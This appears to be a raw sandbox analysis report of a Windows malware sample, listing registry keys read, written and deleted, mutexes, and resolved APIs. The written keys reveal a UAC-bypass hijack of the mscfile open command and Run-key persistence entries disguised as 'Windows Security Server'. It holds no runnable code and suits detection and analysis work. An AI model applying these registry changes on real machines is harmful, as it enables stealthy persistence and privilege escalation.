HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.asp\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.bas\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.bat\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cer\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.chm\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cmd\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.com\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cpl\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.crt\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.gadget\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.grp\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.hlp\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.hta\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.inf\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.js\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.JSE\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.lnk\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\eventvwr.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\eventvwr.exe
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\*
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\eventvwr.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\*
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\eventvwr.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\*
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1806
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1806
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\safer\codeidentifiers\TransparentEnabled
HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command\command
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\UsePathEnvVarForCommandTemplates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\InheritConsoleHandles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun
HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\SetWorkingDirectoryFromTarget
HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\NoWorkingDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor\DisableUNCCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor\EnableExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor\DelayedExpansion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor\DefaultColor
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor\CompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor\PathCompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DisableUNCCheck
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DefaultColor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\39D25951
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\mcrserver_RASAPI32\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\mcrserver_RASAPI32\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\mcrserver_RASAPI32\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\mcrserver_RASAPI32\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\mcrserver_RASAPI32\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\mcrserver_RASAPI32\FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Security Server
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\System Bust
HKEY_CURRENT_USER\Control Panel\Desktop\ScreenSaveTimeOut

Write Keys

HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\trickkk_RASAPI32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\trickkk_RASAPI32\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\trickkk_RASAPI32\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\trickkk_RASAPI32\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\trickkk_RASAPI32\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\trickkk_RASAPI32\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\trickkk_RASAPI32\FileDirectory
HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command
HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\LastServiceStart
HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Transports\Decoupled\Server
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Server\CreationTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Server\MarshaledProxy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Server\ProcessIdentifier
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ConfigValueEssNeedsLoading
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\List of event-active namespaces
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect
HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\mcrserver_RASAPI32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\mcrserver_RASAPI32\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\mcrserver_RASAPI32\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\mcrserver_RASAPI32\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\mcrserver_RASAPI32\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\mcrserver_RASAPI32\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\mcrserver_RASAPI32\FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Security Server
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\System Bust
HKEY_CURRENT_USER\Control Panel\Desktop\ScreenSaveTimeOut

Delete Keys

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName

Mutexes

Global\CLR_CASOFF_MUTEX
Global\.net clr networking
cn33532nasjkd
Local\ZoneAttributeCacheCounterMutex
Local\ZonesCacheCounterMutex
Local\ZonesLockedCacheCounterMutex

Resolved APIs

advapi32.dll.RegOpenKeyExW
advapi32.dll.RegQueryInfoKeyW
advapi32.dll.RegEnumKeyExW
advapi32.dll.RegEnumValueW
advapi32.dll.RegCloseKey
advapi32.dll.RegQueryValueExW
kernel32.dll.FlsAlloc
kernel32.dll.FlsFree
kernel32.dll.FlsGetValue
kernel32.dll.FlsSetValue
kernel32.dll.InitializeCriticalSectionEx
kernel32.dll.CreateEventExW
kernel32.dll.CreateSemaphoreExW
kernel32.dll.SetThreadStackGuarantee
kernel32.dll.CreateThreadpoolTimer
kernel32.dll.SetThreadpoolTimer
kernel32.dll.WaitForThreadpoolTimerCallbacks
kernel32.dll.CloseThreadpoolTimer
kernel32.dll.CreateThreadpoolWait
kernel32.dll.SetThreadpoolWait
kernel32.dll.CloseThreadpoolWait
kernel32.dll.FlushProcessWriteBuffers
kernel32.dll.FreeLibraryWhenCallbackReturns
kernel32.dll.GetCurrentProcessorNumber
kernel32.dll.GetLogicalProcessorInformation
kernel32.dll.CreateSymbolicLinkW
kernel32.dll.EnumSystemLocalesEx
kernel32.dll.CompareStringEx
kernel32.dll.GetDateFormatEx
kernel32.dll.GetLocaleInfoEx
kernel32.dll.GetTimeFormatEx
kernel32.dll.GetUserDefaultLocaleName
kernel32.dll.IsValidLocaleName
kernel32.dll.LCMapStringEx
kernel32.dll.GetTickCount64
advapi32.dll.EventRegister
mscoree.dll.#142
mscoreei.dll.RegisterShimImplCallback
mscoreei.dll.OnShimDllMainCalled
mscoreei.dll._CorExeMain
shlwapi.dll.UrlIsW
version.dll.GetFileVersionInfoSizeW
version.dll.GetFileVersionInfoW
version.dll.VerQueryValueW
kernel32.dll.InitializeCriticalSectionAndSpinCount
msvcrt.dll._set_error_mode
msvcrt.dll.?set_terminate@@YAP6AXXZP6AXXZ@Z
kernel32.dll.FindActCtxSectionStringW
kernel32.dll.GetSystemWindowsDirectoryW
mscoree.dll.GetProcessExecutableHeap
mscoreei.dll.GetProcessExecutableHeap
mscorwks.dll._CorExeMain
mscorwks.dll.GetCLRFunction
advapi32.dll.RegisterTraceGuidsW
advapi32.dll.UnregisterTraceGuids
advapi32.dll.GetTraceLoggerHandle
advapi32.dll.GetTraceEnableLevel
advapi32.dll.GetTraceEnableFlags
advapi32.dll.TraceEvent
mscoree.dll.IEE
mscoreei.dll.IEE
mscorwks.dll.IEE
mscoree.dll.GetStartupFlags
mscoreei.dll.GetStartupFlags
mscoree.dll.GetHostConfigurationFile
mscoreei.dll.GetHostConfigurationFile
mscoreei.dll.GetCORVersion
mscoree.dll.GetCORSystemDirectory
mscoreei.dll.GetCORSystemDirectory_RetAddr
mscoreei.dll.CreateConfigStream
ntdll.dll.RtlVirtualUnwind
kernel32.dll.IsWow64Process
advapi32.dll.AllocateAndInitializeSid
advapi32.dll.OpenProcessToken
advapi32.dll.GetTokenInformation
advapi32.dll.InitializeAcl
advapi32.dll.AddAccessAllowedAce
advapi32.dll.FreeSid
kernel32.dll.AddVectoredContinueHandler
kernel32.dll.RemoveVectoredContinueHandler
advapi32.dll.ConvertSidToStringSidW
shell32.dll.SHGetFolderPathW
kernel32.dll.GetWriteWatch
kernel32.dll.ResetWriteWatch
kernel32.dll.CreateMemoryResourceNotification
kernel32.dll.QueryMemoryResourceNotification
kernel32.dll.GlobalMemoryStatusEx
kernel32.dll.GetVersionExW
kernel32.dll.GetFullPathNameW
ole32.dll.CoInitializeEx
cryptbase.dll.SystemFunction036
ole32.dll.CoGetContextToken
advapi32.dll.CryptAcquireContextA
advapi32.dll.CryptReleaseContext
advapi32.dll.CryptCreateHash
advapi32.dll.CryptDestroyHash
advapi32.dll.CryptHashData
advapi32.dll.CryptGetHashParam
advapi32.dll.CryptImportKey
advapi32.dll.CryptExportKey
advapi32.dll.CryptGenKey
advapi32.dll.CryptGetKeyParam
advapi32.dll.CryptDestroyKey
advapi32.dll.CryptVerifySignatureA
advapi32.dll.CryptSignHashA
advapi32.dll.CryptGetProvParam
advapi32.dll.CryptGetUserKey
advapi32.dll.CryptEnumProvidersA
mscoree.dll.GetMetaDataInternalInterface
mscoreei.dll.GetMetaDataInternalInterface
mscorwks.dll.GetMetaDataInternalInterface
mscorjit.dll.getJit
kernel32.dll.CloseHandle
kernel32.dll.GetCurrentProcess
kernel32.dll.LocalFree
kernel32.dll.LocalAlloc
mscoree.dll.ND_RI4
mscoreei.dll.ND_RI4
advapi32.dll.DuplicateTokenEx
advapi32.dll.CheckTokenMembership
kernel32.dll.CreateEventW
ole32.dll.CoGetObjectContext
sechost.dll.LookupAccountNameLocalW
advapi32.dll.LookupAccountSidW
sechost.dll.LookupAccountSidLocalW
cryptsp.dll.CryptAcquireContextW
cryptsp.dll.CryptGenRandom
ole32.dll.NdrOleInitializeExtension
ole32.dll.CoGetClassObject
ole32.dll.CoGetMarshalSizeMax
ole32.dll.CoMarshalInterface
ole32.dll.CoUnmarshalInterface
ole32.dll.StringFromIID
ole32.dll.CoGetPSClsid
ole32.dll.CoTaskMemAlloc
ole32.dll.CoTaskMemFree
ole32.dll.CoCreateInstance
ole32.dll.CoReleaseMarshalData
ole32.dll.DcomChannelSetHResult
rpcrtremote.dll.I_RpcExtInitializeExtensionPoint
kernel32.dll.LoadLibraryA
kernel32.dll.GetACP
kernel32.dll.GetUserDefaultUILanguage
kernel32.dll.UnmapViewOfFile
kernel32.dll.lstrlen
kernel32.dll.lstrlenW
kernel32.dll.GetProcAddress
wminet_utils.dll.ResetSecurity
wminet_utils.dll.SetSecurity
wminet_utils.dll.BlessIWbemServices
wminet_utils.dll.BlessIWbemServicesObject
wminet_utils.dll.GetPropertyHandle
wminet_utils.dll.WritePropertyValue
wminet_utils.dll.Clone
wminet_utils.dll.VerifyClientKey
wminet_utils.dll.GetQualifierSet
wminet_utils.dll.Get
wminet_utils.dll.Put
wminet_utils.dll.Delete
wminet_utils.dll.GetNames
wminet_utils.dll.BeginEnumeration
wminet_utils.dll.Next
wminet_utils.dll.EndEnumeration
wminet_utils.dll.GetPropertyQualifierSet
wminet_utils.dll.GetObjectText
wminet_utils.dll.SpawnDerivedClass
wminet_utils.dll.SpawnInstance
wminet_utils.dll.CompareTo
wminet_utils.dll.GetPropertyOrigin
wminet_utils.dll.InheritsFrom
wminet_utils.dll.GetMethod
wminet_utils.dll.PutMethod
wminet_utils.dll.DeleteMethod
wminet_utils.dll.BeginMethodEnumeration
wminet_utils.dll.NextMethod
wminet_utils.dll.EndMethodEnumeration
wminet_utils.dll.GetMethodQualifierSet
wminet_utils.dll.GetMethodOrigin
wminet_utils.dll.QualifierSet_Get
wminet_utils.dll.QualifierSet_Put
wminet_utils.dll.QualifierSet_Delete
wminet_utils.dll.QualifierSet_GetNames
wminet_utils.dll.QualifierSet_BeginEnumeration
wminet_utils.dll.QualifierSet_Next
wminet_utils.dll.QualifierSet_EndEnumeration
wminet_utils.dll.GetCurrentApartmentType
wminet_utils.dll.GetDemultiplexedStub
wminet_utils.dll.CreateInstanceEnumWmi
wminet_utils.dll.CreateClassEnumWmi
wminet_utils.dll.ExecQueryWmi
wminet_utils.dll.ExecNotificationQueryWmi
wminet_utils.dll.PutInstanceWmi
wminet_utils.dll.PutClassWmi
wminet_utils.dll.CloneEnumWbemClassObject
wminet_utils.dll.ConnectServerWmi
ole32.dll.IIDFromString
ole32.dll.CoCreateFreeThreadedMarshaler
oleaut32.dll.#2
oleaut32.dll.#6
oleaut32.dll.SysAllocStringLen
kernel32.dll.GetThreadPreferredUILanguages
kernel32.dll.SetThreadPreferredUILanguages
kernel32.dll.LocaleNameToLCID
kernel32.dll.LCIDToLocaleName
kernel32.dll.GetSystemDefaultLocaleName
fastprox.dll.DllGetClassObject
fastprox.dll.DllCanUnloadNow
oleaut32.dll.SysFreeString
oleaut32.dll.#283
oleaut32.dll.#284
kernel32.dll.RegOpenKeyExW
oleaut32.dll.#9
oleaut32.dll.#7
kernel32.dll.SetErrorMode
kernel32.dll.GetFileAttributesExW
mscoreei.dll.LoadLibraryShim
culture.dll.ConvertLangIdToCultureName
bcrypt.dll.BCryptGetFipsAlgorithmMode
cryptsp.dll.CryptHashData
cryptsp.dll.CryptGetHashParam
cryptsp.dll.CryptDestroyHash
kernel32.dll.GetSystemInfo
kernel32.dll.CreateFileW
kernel32.dll.GetFileType
kernel32.dll.GetFileSize
kernel32.dll.ReadFile
mscoree.dll.ND_RI2
mscoreei.dll.ND_RI2
rasapi32.dll.RasEnumConnectionsW
rtutils.dll.TraceRegisterExA
rtutils.dll.TracePrintfExA
sechost.dll.OpenSCManagerW
sechost.dll.OpenServiceW
sechost.dll.QueryServiceStatus
sechost.dll.CloseServiceHandle
ws2_32.dll.WSAStartup
ws2_32.dll.WSASocketW
ws2_32.dll.setsockopt
ws2_32.dll.WSAEventSelect
ws2_32.dll.ioctlsocket
ws2_32.dll.closesocket
kernel32.dll.GetCurrentProcessId
kernel32.dll.GetComputerNameW
advapi32.dll.ConvertStringSecurityDescriptorToSecurityDescriptorW
kernel32.dll.CreateFileMappingW
kernel32.dll.MapViewOfFile
kernel32.dll.VirtualQuery
kernel32.dll.ReleaseMutex
advapi32.dll.CreateWellKnownSid
kernel32.dll.CreateMutexW
kernel32.dll.WaitForSingleObject
kernel32.dll.OpenMutexW
kernel32.dll.OpenProcess
kernel32.dll.GetProcessTimes
ws2_32.dll.WSAIoctl
kernel32.dll.FormatMessageW
rasapi32.dll.RasConnectionNotificationW
sechost.dll.OpenSCManagerA
sechost.dll.OpenServiceA
sechost.dll.NotifyServiceStatusChangeA
advapi32.dll.RegOpenCurrentUser
advapi32.dll.RegNotifyChangeKeyValue
winhttp.dll.WinHttpGetIEProxyConfigForCurrentUser
kernel32.dll.SetEvent
kernel32.dll.ResetEvent
iphlpapi.dll.GetNetworkParams
dnsapi.dll.DnsQueryConfig
iphlpapi.dll.GetAdaptersAddresses
iphlpapi.dll.GetIpInterfaceEntry
iphlpapi.dll.GetBestInterfaceEx
ws2_32.dll.inet_addr
ws2_32.dll.getaddrinfo
ws2_32.dll.freeaddrinfo
ws2_32.dll.WSAConnect
ws2_32.dll.send
ws2_32.dll.recv
ws2_32.dll.shutdown
kernel32.dll.GetStdHandle
kernel32.dll.GetCurrentDirectoryW
shfolder.dll.SHGetFolderPathW
kernel32.dll.CreateMutexA
kernel32.dll.GetLastError
kernel32.dll.WriteFile
advapi32.dll.RegCreateKeyExW
advapi32.dll.RegSetValueExW
kernel32.dll.RtlMoveMemory
uxtheme.dll.ThemeInitApiHook
user32.dll.IsProcessDPIAware
shell32.dll.ShellExecuteEx
shell32.dll.ShellExecuteExW
setupapi.dll.CM_Get_Device_Interface_List_Size_ExW
setupapi.dll.CM_Get_Device_Interface_List_ExW
comctl32.dll.#332
comctl32.dll.#386
ole32.dll.CoUninitialize
ole32.dll.CoRevokeInitializeSpy
comctl32.dll.#388
oleaut32.dll.#500
kernel32.dll.DuplicateHandle
advapi32.dll.RegDeleteKeyW
advapi32.dll.LookupPrivilegeValueW
advapi32.dll.AdjustTokenPrivileges
ntdll.dll.NtQuerySystemInformation
cryptsp.dll.CryptReleaseContext
ntdll.dll.EtwUnregisterTraceGuids
comctl32.dll.#321
kernel32.dll.CreateActCtxW
kernel32.dll.AddRefActCtx
kernel32.dll.ReleaseActCtx
kernel32.dll.ActivateActCtx
kernel32.dll.DeactivateActCtx
kernel32.dll.GetCurrentActCtx
kernel32.dll.QueryActCtxW
advapi32.dll.EventUnregister
vssapi.dll.CreateWriter
advapi32.dll.LookupAccountNameW
samcli.dll.NetLocalGroupGetMembers
samlib.dll.SamConnect
rpcrt4.dll.NdrClientCall3
rpcrt4.dll.RpcStringBindingComposeW
rpcrt4.dll.RpcBindingFromStringBindingW
rpcrt4.dll.RpcStringFreeW
rpcrt4.dll.RpcBindingFree
samlib.dll.SamOpenDomain
samlib.dll.SamLookupNamesInDomain
samlib.dll.SamOpenAlias
samlib.dll.SamFreeMemory
samlib.dll.SamCloseHandle
samlib.dll.SamGetMembersInAlias
netutils.dll.NetApiBufferFree
samlib.dll.SamEnumerateDomainsInSamServer
samlib.dll.SamLookupDomainInSamServer
ole32.dll.CoCreateGuid
ole32.dll.StringFromCLSID
oleaut32.dll.#4
propsys.dll.VariantToPropVariant
wbemcore.dll.Reinitialize
wbemsvc.dll.DllGetClassObject
wbemsvc.dll.DllCanUnloadNow
authz.dll.AuthzInitializeContextFromToken
authz.dll.AuthzInitializeObjectAccessAuditEvent2
authz.dll.AuthzAccessCheck
authz.dll.AuthzFreeAuditEvent
authz.dll.AuthzFreeContext
authz.dll.AuthzInitializeResourceManager
authz.dll.AuthzFreeResourceManager
rpcrt4.dll.RpcBindingCreateW
rpcrt4.dll.RpcBindingBind
rpcrt4.dll.I_RpcMapWin32Status
advapi32.dll.EventWrite
kernel32.dll.RegCloseKey
kernel32.dll.RegSetValueExW
kernel32.dll.RegQueryValueExW
wmisvc.dll.IsImproperShutdownDetected
wevtapi.dll.EvtRender
wevtapi.dll.EvtNext
wevtapi.dll.EvtClose
wevtapi.dll.EvtQuery
wevtapi.dll.EvtCreateRenderContext
rpcrt4.dll.RpcBindingSetAuthInfoExW
rpcrt4.dll.RpcBindingSetOption
ole32.dll.CreateStreamOnHGlobal
kernelbase.dll.InitializeAcl
kernelbase.dll.AddAce
sechost.dll.ConvertStringSecurityDescriptorToSecurityDescriptorW
kernel32.dll.IsThreadAFiber
kernel32.dll.OpenProcessToken
kernelbase.dll.GetTokenInformation
kernelbase.dll.DuplicateTokenEx
kernelbase.dll.AdjustTokenPrivileges
kernelbase.dll.AllocateAndInitializeSid
kernelbase.dll.CheckTokenMembership
kernel32.dll.SetThreadToken
oleaut32.dll.#285
advapi32.dll.RegOpenKeyW
ole32.dll.CLSIDFromString
oleaut32.dll.#17
oleaut32.dll.#20
oleaut32.dll.#19
oleaut32.dll.#25
oleaut32.dll.#286
ole32.dll.CoRevertToSelf
advapi32.dll.LogonUserExExW
sspicli.dll.LogonUserExExW
authz.dll.AuthzInitializeContextFromSid
ole32.dll.CoGetCallContext
ole32.dll.CoImpersonateClient
advapi32.dll.OpenThreadToken
